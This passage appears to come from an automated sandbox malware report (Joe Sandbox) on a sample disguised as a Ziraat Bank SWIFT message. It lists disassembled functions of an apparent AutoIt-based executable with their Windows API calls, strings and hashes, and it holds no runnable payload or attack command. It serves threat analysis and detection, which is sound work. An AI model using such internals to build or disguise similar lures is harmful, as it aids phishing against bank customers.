ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0010E79B
GlobalUnlock.KERNEL32(00000000), ref: 0010E7A4
CloseHandle.KERNEL32(00000000), ref: 0010E7AB
CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0010E7BC
OleLoadPicture.OLEAUT32(?,00000000,00000000,0012D9BC,?), ref: 0010E7D5
GlobalFree.KERNEL32(00000000), ref: 0010E7E5
GetObjectW.GDI32(?,00000018,000000FF), ref: 0010E809
CopyImage.USER32(?,00000000,?,?,00002000), ref: 0010E834
DeleteObject.GDI32(00000000), ref: 0010E85C
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0010E872

Strings

@U=u, xrefs: 0010E872

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID: @U=u
API String ID: 3840717409-2594219639
Opcode ID: 998ed30b95b6de051f76ec93d7ff700b1f8412ad2f2555f820f7f99bace7523c
Instruction ID: 65cc8203432fc9edd5f622a79285608acb039ea2658b70794007808d6d63a511
Opcode Fuzzy Hash: 998ed30b95b6de051f76ec93d7ff700b1f8412ad2f2555f820f7f99bace7523c
Instruction Fuzzy Hash: 8D415A75600204FFDB219F65EC88EAA7BB8FF89711F108458F946D72A0D770AD92CB60

Function 00103639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00103735
RegCreateKeyExW.ADVAPI32(?,?,00000000,0013DC00,00000000,?,00000000,?,?), ref: 001037A3
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 001037EB
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00103874
RegCloseKey.ADVAPI32(?), ref: 00103B94
RegCloseKey.ADVAPI32(00000000), ref: 00103BA1

Strings

REG_SZ, xrefs: 001038B2
REG_DWORD, xrefs: 00103A65
REG_BINARY, xrefs: 00103B2F
REG_QWORD, xrefs: 00103AE2
REG_EXPAND_SZ, xrefs: 00103811
REG_MULTI_SZ, xrefs: 0010395C

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: c2f4036b188d778adec0ed43148236687c3d121322929178ea2bdb616dbdc8f6
Instruction ID: fb341bd738a92511a959b6520de83789d37f49a91f2f50cdb3c185291f331490
Opcode Fuzzy Hash: c2f4036b188d778adec0ed43148236687c3d121322929178ea2bdb616dbdc8f6
Instruction Fuzzy Hash: 2D025A75204601AFCB14EF54C855E6AB7E9FF89720F04845DF99A9B3A2CB70EE41CB81

Function 000DCF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 000DCF91
__swprintf.LIBCMT ref: 000DD032
_wcscmp.LIBCMT ref: 000DD045
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 000DD09A
_wcscmp.LIBCMT ref: 000DD0D6
GetClassNameW.USER32(?,?,00000400), ref: 000DD10D
GetDlgCtrlID.USER32(?), ref: 000DD15F
GetWindowRect.USER32(?,?), ref: 000DD195
GetParent.USER32(?), ref: 000DD1B3
ScreenToClient.USER32(00000000), ref: 000DD1BA
GetClassNameW.USER32(?,?,00000100), ref: 000DD234
_wcscmp.LIBCMT ref: 000DD248
GetWindowTextW.USER32(?,?,00000400), ref: 000DD26E
_wcscmp.LIBCMT ref: 000DD282

Strings

%s%u, xrefs: 000DD02C

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
String ID: %s%u
API String ID: 3119225716-679674701
Opcode ID: bc0516f80dda49ece4797d6a29c25273ea0c5d145be24dd9cf6a60c6f3dd588a
Instruction ID: 31bd82c31111d2a8a631b068f7ff8428aa92cc989ed2b4d14c1e954cd222c80f
Opcode Fuzzy Hash: bc0516f80dda49ece4797d6a29c25273ea0c5d145be24dd9cf6a60c6f3dd588a
Instruction Fuzzy Hash: 16A1CE71604302AFD754DF64C884FEAB7E8FF54314F00862BF99992291DB30EA56CBA1

Function 000DD8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 000DD8EB
_wcscmp.LIBCMT ref: 000DD8FC
GetWindowTextW.USER32(00000001,?,00000400), ref: 000DD924
CharUpperBuffW.USER32(?,00000000), ref: 000DD941
_wcscmp.LIBCMT ref: 000DD95F
_wcsstr.LIBCMT ref: 000DD970
GetClassNameW.USER32(00000018,?,00000400), ref: 000DD9A8
_wcscmp.LIBCMT ref: 000DD9B8
GetWindowTextW.USER32(00000002,?,00000400), ref: 000DD9DF
GetClassNameW.USER32(00000018,?,00000400), ref: 000DDA28
_wcscmp.LIBCMT ref: 000DDA38
GetClassNameW.USER32(00000010,?,00000400), ref: 000DDA60
GetWindowRect.USER32(00000004,?), ref: 000DDAC9

Strings

ThumbnailClass, xrefs: 000DD9B3, 000DDA33
@, xrefs: 000DD8C6

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: af2fde2309bbc014fd6cffbd79a510537aa26e4a4f3270f722384fd43af30aa3
Instruction ID: d3e4749ded149c533401eccbcfc3f6b315a7e61109d2b55811e85e9747ffdcb9
Opcode Fuzzy Hash: af2fde2309bbc014fd6cffbd79a510537aa26e4a4f3270f722384fd43af30aa3
Instruction Fuzzy Hash: 0F819C310083459BDB11DF54C885FAABBE8EF84318F04846BFD899A296DB34DD46CBB1

Function 0010CE58 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0010CEFB
DestroyWindow.USER32(?,?), ref: 0010CF73
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0010CFF4
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0010D016
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0010D025
DestroyWindow.USER32(?), ref: 0010D042
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,000A0000,00000000), ref: 0010D075
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0010D094
GetDesktopWindow.USER32 ref: 0010D0A9
GetWindowRect.USER32(00000000), ref: 0010D0B0
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0010D0C2
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0010D0DA

Part of subcall function 000BB526: GetWindowLongW.USER32(?,000000EB), ref: 000BB537

Strings

@U=u, xrefs: 0010CFA7, 0010D081
tooltips_class32, xrefs: 0010CFED, 0010D06E
0, xrefs: 0010CF1B

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
String ID: 0$@U=u$tooltips_class32
API String ID: 3877571568-1130792468
Opcode ID: c88c4ce0d67122dfdee7b867519f553948481e128d32b5de77068b4878edadd3
Instruction ID: 13a482f6d1b974a67c221fb2792ff1b21b12ce3e6370265690950fda89c9ca27
Opcode Fuzzy Hash: c88c4ce0d67122dfdee7b867519f553948481e128d32b5de77068b4878edadd3
Instruction Fuzzy Hash: 0171BFB4140305AFE724CF68DC85FA677E5EB89704F18451DF989872A1D7B0E982DB22

Function 0010F351 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 178windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 000BB34E: GetWindowLongW.USER32(?,000000EB), ref: 000BB35F

DragQueryPoint.SHELL32(?,?), ref: 0010F37A

Part of subcall function 0010D7DE: ClientToScreen.USER32(?,?), ref: 0010D807
Part of subcall function 0010D7DE: GetWindowRect.USER32(?,?), ref: 0010D87D
Part of subcall function 0010D7DE: PtInRect.USER32(?,?,0010ED5A), ref: 0010D88D

SendMessageW.USER32(?,000000B0,?,?), ref: 0010F3E3
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0010F3EE
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0010F411
_wcscat.LIBCMT ref: 0010F441
SendMessageW.USER32(?,000000C2,00000001,?), ref: 0010F458
SendMessageW.USER32(?,000000B0,?,?), ref: 0010F471
SendMessageW.USER32(?,000000B1,?,?), ref: 0010F488
SendMessageW.USER32(?,000000B1,?,?), ref: 0010F4AA
DragFinish.SHELL32(?), ref: 0010F4B1
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0010F59C

Strings

@GUI_DRAGFILE, xrefs: 0010F54B
@GUI_DRAGID, xrefs: 0010F510
@U=u, xrefs: 0010F3E3, 0010F458, 0010F471, 0010F488, 0010F4AA
@GUI_DROPID, xrefs: 0010F4D1

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$@U=u
API String ID: 169749273-762882726
Opcode ID: 5036b3478e87300ce0e5eb50e5c803c0fb126e80bbc4e3f029ffc5021eb3702b
Instruction ID: 0152ade8b47b0c556c176fa0d3b6a484f4a5d0d0c8025d1ab1c6cb9c449d0523
Opcode Fuzzy Hash: 5036b3478e87300ce0e5eb50e5c803c0fb126e80bbc4e3f029ffc5021eb3702b
Instruction Fuzzy Hash: 90616971108301AFD315EF64DC86E9FBBF8EF89710F000A1EF595961A1DB709A5ACB52

Function 000DD6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 000DD753

Strings

CLASSNAME=, xrefs: 000DD790
ACTIVE, xrefs: 000DD72E
LAST, xrefs: 000DD718
HANDLE=, xrefs: 000DD74C
[ACTIVE, xrefs: 000DD740
[CLASS:, xrefs: 000DD7A3
REGEXP=, xrefs: 000DD768
[REGEXPTITLE:, xrefs: 000DD77B
[LAST, xrefs: 000DD800
[HANDLE:, xrefs: 000DD75F
ALL, xrefs: 000DD7E7
[ALL, xrefs: 000DD7F9

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 05f43be819138a530ced96681eb7c06bbced977fa6224fe597867726935f060c
Instruction ID: dcb00648925901a96ea21dd8fa9251e122ec33c93133693eeda0fc01c711e8b2
Opcode Fuzzy Hash: 05f43be819138a530ced96681eb7c06bbced977fa6224fe597867726935f060c
Instruction Fuzzy Hash: 99315E32A48305E6DA25EB90DD43FED73B59F22712F20016BF851B51D3FF62AA08D661

Function 000F79B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 000F79C6
LoadCursorW.USER32(00000000,00007F00), ref: 000F79D1
LoadCursorW.USER32(00000000,00007F03), ref: 000F79DC
LoadCursorW.USER32(00000000,00007F8B), ref: 000F79E7
LoadCursorW.USER32(00000000,00007F01), ref: 000F79F2
LoadCursorW.USER32(00000000,00007F81), ref: 000F79FD
LoadCursorW.USER32(00000000,00007F88), ref: 000F7A08
LoadCursorW.USER32(00000000,00007F80), ref: 000F7A13
LoadCursorW.USER32(00000000,00007F86), ref: 000F7A1E
LoadCursorW.USER32(00000000,00007F83), ref: 000F7A29
LoadCursorW.USER32(00000000,00007F85), ref: 000F7A34
LoadCursorW.USER32(00000000,00007F82), ref: 000F7A3F
LoadCursorW.USER32(00000000,00007F84), ref: 000F7A4A
LoadCursorW.USER32(00000000,00007F04), ref: 000F7A55
LoadCursorW.USER32(00000000,00007F02), ref: 000F7A60
LoadCursorW.USER32(00000000,00007F89), ref: 000F7A6B
GetCursorInfo.USER32(?), ref: 000F7A7B

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: e100d187ec9f97a134c01671ecaeb2f6a7ad1c1a656fabb0c1fc440cc8c838ff
Instruction ID: cf6280380b699207b61ec5a06d08e0a5489e22004515d11ea31128baad6caa67
Opcode Fuzzy Hash: e100d187ec9f97a134c01671ecaeb2f6a7ad1c1a656fabb0c1fc440cc8c838ff
Instruction Fuzzy Hash: 353129B0D0831EAADB509FB68C899AFBFE8FF44750F504536E50DE7180DA78A5018F91

Function 000AC833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON

Download Yara Rule

APIs

Part of subcall function 000BE968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,000AC8B7,?,00002000,?,?,00000000,?,000A419E,?,?,?,0013DC00), ref: 000BE984

Part of subcall function 000A660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000A53B1,?,?,000A61FF,?,00000000,00000001,00000000), ref: 000A662F

__wsplitpath.LIBCMT ref: 000AC93E

Part of subcall function 000C1DFC: __wsplitpath_helper.LIBCMT ref: 000C1E3C

_wcscpy.LIBCMT ref: 000AC953
_wcscat.LIBCMT ref: 000AC968
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 000AC978
SetCurrentDirectoryW.KERNEL32(?), ref: 000ACABE

Part of subcall function 000AB337: _wcscpy.LIBCMT ref: 000AB36F

Strings

AU3!, xrefs: 000AC90C
EA06, xrefs: 001130C9
Bad directive syntax error, xrefs: 00113429
>>>AUTOIT SCRIPT<<<, xrefs: 0011311B
Error opening the file, xrefs: 001130B4, 0011313D
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00113098
Unterminated string, xrefs: 00113470

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 2258743419-1018226102
Opcode ID: 557b4fc06101b2617b71b175ed05de81ac43439f23ecd7f28a713ae17bc59575
Instruction ID: ec5292121d2f977c75f8bcf175a9ec8cd2ea58adfe909923c3a9abcd3d10ab4f
Opcode Fuzzy Hash: 557b4fc06101b2617b71b175ed05de81ac43439f23ecd7f28a713ae17bc59575
Instruction Fuzzy Hash: C5128C715083419FC728EF64C881AEFBBE5BF99304F04492EF59993252DB30DA49CB52

Function 0010716A Relevance: 24.7, APIs: 2, Strings: 12, Instructions: 244windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 001071FC
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00107247

Strings

GETTOTALCOUNT, xrefs: 0010722A
COLLAPSE, xrefs: 0010728D
@U=u, xrefs: 00107247
GETITEMCOUNT, xrefs: 00107311
CHECK, xrefs: 00107267
ISCHECKED, xrefs: 001073B2
GETTEXT, xrefs: 00107382
EXISTS, xrefs: 001072B0
UNCHECK, xrefs: 0010740B
SELECT, xrefs: 001073E0
EXPAND, xrefs: 001072E1
GETSELECTED, xrefs: 0010733F

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: @U=u$CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-383632319
Opcode ID: 2d6f44f2fae1fb23e347ff3664e662c6337eb64ae84c483db399768ade27ceb3
Instruction ID: 6c0ffd9996eae5c79713f0f15ab9dd76a740484825ee6b84eb2f0803042c5f8a
Opcode Fuzzy Hash: 2d6f44f2fae1fb23e347ff3664e662c6337eb64ae84c483db399768ade27ceb3
Instruction Fuzzy Hash: 92916B746083419BCB04EF20C851AAEBBA1BF95314F014859F9966B3E3DB70FD4ADB91

Function 0010E4F5 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 199windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0010E5AB
LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00109808,?), ref: 0010E607
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0010E647
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0010E68C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0010E6C3
FreeLibrary.KERNEL32(?,00000004,?,?,?,00109808,?), ref: 0010E6CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0010E6DF
DestroyIcon.USER32(?), ref: 0010E6EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0010E70B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0010E717

Part of subcall function 000C0FA7: __wcsicmp_l.LIBCMT ref: 000C1030

Strings

@U=u, xrefs: 0010E6F7
.exe, xrefs: 0010E541
.icl, xrefs: 0010E521
.dll, xrefs: 0010E564

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl$@U=u
API String ID: 1212759294-1639919054
Opcode ID: b9fecf8777b2409482f58433d57df73224ab441ff2f5afb99c3075ae14ed812a
Instruction ID: 5f444326e40680c148c78be97c09e01e335924e6870ff262805302a138fcd50b
Opcode Fuzzy Hash: b9fecf8777b2409482f58433d57df73224ab441ff2f5afb99c3075ae14ed812a
Instruction Fuzzy Hash: C5612171900218FBEB24DF64DC86FFE7BA8BB18714F104915F955D60D1EBB1AA90CBA0

Function 000EAAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 000EAB3D
VariantCopy.OLEAUT32(?,?), ref: 000EAB46
VariantClear.OLEAUT32(?), ref: 000EAB52
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 000EAC40
__swprintf.LIBCMT ref: 000EAC70
VarR8FromDec.OLEAUT32(?,?), ref: 000EAC9C
VariantInit.OLEAUT32(?), ref: 000EAD4D
SysFreeString.OLEAUT32(00000016), ref: 000EADDF
VariantClear.OLEAUT32(?), ref: 000EAE35
VariantClear.OLEAUT32(?), ref: 000EAE44
VariantInit.OLEAUT32(00000000), ref: 000EAE80

Strings

Default, xrefs: 000EACFD
%4d%02d%02d%02d%02d%02d, xrefs: 000EAC6A

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: 08f4a5427844ec7ab126c7f67eac0a25dba4c09e8db33f2b845b2b7c598987b5
Instruction ID: c40235971af7a5af432e026b09a73730a03a0610a5ac3b79b2ecdd393187621e
Opcode Fuzzy Hash: 08f4a5427844ec7ab126c7f67eac0a25dba4c09e8db33f2b845b2b7c598987b5
Instruction Fuzzy Hash: 4FD1DE31704295EFDB249F66D884BAEB7B5BF4A700F248055E405BB682DB70FC50DBA2

Function 000ED219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 000A936C: __swprintf.LIBCMT ref: 000A93AB
Part of subcall function 000A936C: __itow.LIBCMT ref: 000A93DF

CharLowerBuffW.USER32(?,?), ref: 000ED292
GetDriveTypeW.KERNEL32 ref: 000ED2DF
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 000ED327
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 000ED35E
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 000ED38C

Strings

open, xrefs: 000ED2B9
wait, xrefs: 000ED349
type cdaudio alias cd wait, xrefs: 000ED30A
close, xrefs: 000ED298
close cd wait, xrefs: 000ED377
open , xrefs: 000ED2EE
set cd door , xrefs: 000ED32D
closed, xrefs: 000ED2A6, 000ED2AF

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
